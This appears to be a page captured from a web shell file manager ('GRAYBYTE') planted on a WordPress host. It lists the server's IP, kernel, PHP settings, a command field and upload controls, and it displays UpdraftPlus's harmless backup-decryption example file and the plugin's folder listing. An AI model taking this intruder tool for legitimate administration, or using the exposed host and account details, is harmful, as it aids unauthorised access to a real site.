GRAYBYTE WORDPRESS FILE MANAGER5949

Server IP : 162.213.255.40 / Your IP : 216.73.216.121
System : Linux server146.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/hellrfbn/public_html/wp-content/plugins/updraftplus/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/hellrfbn/public_html/wp-content/plugins/updraftplus//example-decrypt.php
<?php
// @codingStandardsIgnoreStart
/*
To dump the decrypted file using the given key on stdout, call:

rijndael_decrypt_file('../path/to/file.crypt' , 'mykey');

Thus, here are the easy instructions:

1) Add a line like the above into this PHP file (not inside these comments, but outside)
e.g.
rijndael_decrypt_file('/home/myself/myfile.crypt' , 'MYKEY');

2) Run this file (and make sure that includes/Rijndael.php is available, if you are moving this file around)
e.g. 
php /home/myself/example-decrypt.php >output.sql.gz

3) You may then want to gunzip the resulting file to have a standard SQL file.
e.g.
gunzip output.sql.gz

*/
// @codingStandardsIgnoreEnd

/**
 * An example of how to decrypt a file
 *
 * @param String $file Full path to file to decrypt
 * @param String $key  Key or salting to be used
 */
function rijndael_decrypt_file($file, $key) {

	include_once(dirname(__FILE__).'/vendor/phpseclib/phpseclib/phpseclib/Crypt/Rijndael.php');

	$rijndael = new Crypt_Rijndael();

	$rijndael->setKey($key);

	$ciphertext = file_get_contents($file);

	print $rijndael->decrypt($ciphertext);// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- intentional binary output

}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 23 2025 07:45:52
hellrfbn / hellrfbn
0755
central
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
css
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
images
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
includes
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
js
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
languages
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
methods
--
July 23 2025 15:03:59
hellrfbn / hellrfbn
0755
templates
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
vendor
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
.htaccess
0.41 KB
July 23 2025 07:38:28
hellrfbn / hellrfbn
0644
SECURITY.md
1.325 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
admin.php
313.794 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
backup.php
227.119 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
changelog-old.txt
124.275 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
class-updraftplus.php
298.28 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
example-decrypt.php
1.172 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
index.html
4.344 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
options.php
12.298 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
readme.txt
161.188 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
restorer.php
237.938 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644
updraftplus.php
16.099 KB
February 05 2025 15:45:31
hellrfbn / hellrfbn
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF